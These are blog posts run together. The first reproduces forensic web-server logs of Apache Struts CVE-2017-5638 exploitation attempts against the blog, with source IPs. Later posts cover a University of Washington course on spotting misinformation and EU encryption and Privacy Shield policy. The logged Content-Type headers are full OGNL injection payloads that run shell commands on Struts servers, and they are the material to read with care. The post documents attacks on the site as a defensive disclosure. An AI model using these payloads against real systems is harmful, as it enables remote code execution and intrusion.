blog.cyberwar.nl-forensic.log:+23218:5940ef00:180|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+26725:5949c3cb:58|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+6599:597b4f8e:d9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+18295:597ef9c9:1e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+24880:5980d5ad:0|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+10800:59856d66:8e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+9129:59a7931c:79|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+15241:59a9759d:61|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+7914:59ba06d2:e9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Aman4Wolves').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|Host:blog.cyberwar.nl

The requests were received from the following IPs:

AS      | IP               | AS Name
2875    | 159.93.36.250    | JINR-AS JINR/HEPNET, RU
4134    | 122.225.98.178   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 182.148.123.59   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 218.94.37.42     | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 220.191.231.222  | CHINANET-BACKBONE No.31,Jin-rong Street, CN
9381    | 223.255.145.158  | WTT-AS-AP WTT HK Limited, HK
18978   | 23.244.78.26     | ENZUINC-US - Enzu Inc, US
37963   | 114.215.47.133   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.27.240.44    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.76.41.162    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.77.179.38    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.41.72.189    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.42.147.64    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 123.57.148.247   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
59019   | 120.92.84.17     | BJKSCNET Beijing Kingsoft Cloud Internet Technology Co., Ltd, CN
134764  | 116.31.125.127   | CT-FOSHAN-IDC CHINANET Guangdong province network, CN

UPDATE 2018-02-10: more log entries in Feb 2018, first one listing struts-pwn, a tool to test systems for CVE-2017-5638 (and perform remote command execution), released 11 months ago):

blog.cyberwar.nl-forensic.log:+31342:5a36c21f:65|GET / HTTP/1.1|Host:149.210.129.7|Connection:keep-alive|Accept-Encoding:gzip, deflate|Accept:*/*|User-Agent:struts-pwn (https%3a//github.com/mazen160/struts-pwn)|Content-Type:%25{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('tokjuoq','tokjuoq')}.multipart/form-data
blog.cyberwar.nl-forensic.log:+536:5a7ee6a9:7d|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/ HTTP/1.1|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#matt= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ("c9fd5ad9-e018-4118-9b93-6ed84ee84121"),#matt.getWriter().flush(),#matt.getWriter().close())}|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive
blog.cyberwar.nl-forensic.log:+28292:5a7ee6a9:162|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D HTTP/1.1|User-Agent:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive

EOF

Calling Bullshit in the Age of Big Data – free/open lectures, tools and case-studies from Washington U Spring 2017 class

The University of Washington had a Spring 2017 class entitled “Calling Bullshit in the Age of Big Data” and makes available the lecture materials at www.callingbullshit.org (Syllabus, Videos, Tools, Case Studies, FAQ).

Lecture titles:

  1. Introduction to bullshit
  2. Spotting bullshit
  3. The natural ecology of bullshit
  4. Causality
  5. Statistical traps
  6. Visualization
  7. Big data
  8. Publication bias
  9. Predatory publishing and scientific misconduct
  10. The ethics of calling bullshit.
  11. Fake news
  12. Refuting bullshit

The course (Twitter: @callin_bull) was created by (mathematical) biology professor Carl T. Bergstrom (Twitter: @CT_Bergstrom) and associate professor data science and ‘science of science’ Jevin West (Twitter: @JevinWest), both affiliated with the University of Washington.

Coverage at The New Yorker: How to Call B.S. on Big Data: A Practical Guide (this link was posted at Hacker News).

Coverage at Salon.com: Explosive growth in bulls**t studies! The latest academic frontier in the age of You Know Who .

Further reading:

EOF

EU LIBE proposes end-to-end encryption in e-Communications; and, re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate

This post shortly highlights two developments regarding EU internet privacy/security.

1. EU LIBE proposes amendment of draft e-Communications regulation to promote end-to-end encryption, seeks prohibition of Member State legislation that would “[weaken] security and encryption”

The EU LIBE Committee released a draft report (.pdf), dated June 9th 2017, on the proposed e-Communications regulation, and specifically promotes end-to-end encryption in Amendment 116:

“The providers of electronic communications services shall ensure that there is sufficient protection in place against unauthorised access or alterations to the electronic communications data, and that the confidentiality and safety of the transmission are also guaranteed by the nature of the means of transmission used or by state-of-the-art end-to-end encryption of the electronic communications data. (…)”

The remainder of that amendment seeks prohibition of nation-level legislation that would “[weaken] security and encryption of their networks and services”:

“The Furthermore, when encryption of electronic communications data is used, decryption, reverse engineering or monitoring of such communications shall be prohibited. Member States shall not impose any obligations on electronic communications service providers that would result in the weakening of the security and encryption of their networks and services.

This, of course, is at odds with interests regarding intelligence & security, which range from the ability to detect & thwart computer network attack/exploitation to the ability to detect and monitor plans to sabotage or steal military equipment or dual-use goods (Wassenaar). It is certainly different from the direction where the European Commission has been heading for years; to that end, also take a look at the The Effect of Encryption on Lawful Access to Communications and Data (.pdf, February 2017, Center for Int’l Security Studies; by Lewis, Cheng & Carter).

The promotion of end-to-end encryption by EU LIBE is not unexpected: part 2 of the STOA study “Mass Surveillance”, dated January 2015, recommended the promotion of end-to-end encryption, and provided several policy options for that. Specifically, see the last paragraph of the following section in the management summary (all emphasis is original) :

(…)

Policy options for the ‘Promote adoption’ scenario

Promote end-to-end encryption

Stimulate awareness of the necessity of using encryption by initiating a media campaign, as awareness of privacy risks is quite low.

Increase the knowledge level of end-users, both individuals and responsible departments in organisations, by setting up an independent platform where users can find information on tools, implementation, do’s and don’ts etc.

Support product security tests by independent institutions such as the Electronic Frontier Foundation that help users make better-informed choices. Support can be a financial contribution, but also promotion of the results. Alternatively the EU can set up its own regular product security test programme.

A parallel option is to stimulate user-friendliness of end-to-end encryption solutions, for instance by promoting existing user-friendly end-to-end encryption solutions for e-mail, messaging, chat etc. Dedicated funding or participation in open-source software end-to-end encryption solutions is also an option to specifically improve user-friendliness.

If the market does not provide security with end-to-end encryption by itself, regulation should be considered, obliging service providers and/or Internet service providers to provide end-to-end protection as standard for data in transit. An additional benefit of regulation would be a concrete political discussion on the balance between privacy and law enforcement and national security, at European and/or national level. The outcome of this debate should be implemented in national legislation.

(…)

I’m not sure what LIBE’s intent / expectation is wrt Amendment 116; to me, it looks like something that is not intended to be adopted “as is” as part of the e-Communications regulation, but rather as something to stimulate debate, which could have a beneficial effect on the final regulation. But I may be wrong.

2. Re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate

On June 13th 2017, the Article 29 Working Party (“WP29”) released a press statement (.pdf), entitled “Preparation of the Privacy Shield annual Joint Review”, that references bulk collection, e.g. of communication or databases containing data about persons, in relation to the EU/US Privacy Shield:

“Regarding the law enforcement and national security part, the WP 29 has questions relating in particular to the latest developments of US law and jurisprudence in the field of privacy. The WP29 also seeks, inter alia, precise evidence to show that bulk collection, when it exists, is “as tailored as feasible”, limited and proportionate. In addition, the WP29 stresses the need to obtain information concerning the nomination of the four missing members of the PCLOB as well as on the appointment of the Ombudsperson and the procedures governing the Ombudsperson mechanism, as they are key elements of the oversight architecture of the Privacy Shield.”

Tip of the Hat to Bavo Van den Heuvel (Twitter: @BavoCranium), who highlighted this in a post on LinkedIn.

Unrelated side note: the revision of the Dutch Intelligence & Security Act of 2002 (“Wiv2002”), tentatively referred to as “Wiv20xx”, expands the Wiv2002 such that the Dutch intelligence and security services (domest: AIVD; military: MIVD) can perform untargeted / bulk search interception of cable communications, and explicitly allows acquisition of bulk data sets through hacking or voluntary cooperation (for instance through remote access); not unlike the bulk powers in the U.K. (more). The oversight framework is significantly revised as well, for instance through addition of ex ante oversight. The Wiv20xx was adopted by the Dutch lower house in Q1/2017 and is now being evaluated by the Dutch senate; its status in the legislative progress can be seen here.

EOF